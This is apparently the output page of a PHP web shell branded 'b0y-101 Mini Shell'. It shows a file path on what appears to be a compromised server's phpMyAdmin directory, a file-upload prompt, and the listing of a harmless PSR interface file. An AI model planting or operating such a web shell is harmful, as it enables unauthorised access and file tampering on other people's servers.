b0y-101 Mini Shell


Current Path : E:/phpMyAdmin/vendor/psr/http-client/src/
File Upload :
Current File : E:/phpMyAdmin/vendor/psr/http-client/src/ClientExceptionInterface.php

<?php

namespace Psr\Http\Client;

/**
 * Every HTTP client related exception MUST implement this interface.
 */
interface ClientExceptionInterface extends \Throwable
{
}

Copyright © 2019 by b0y-101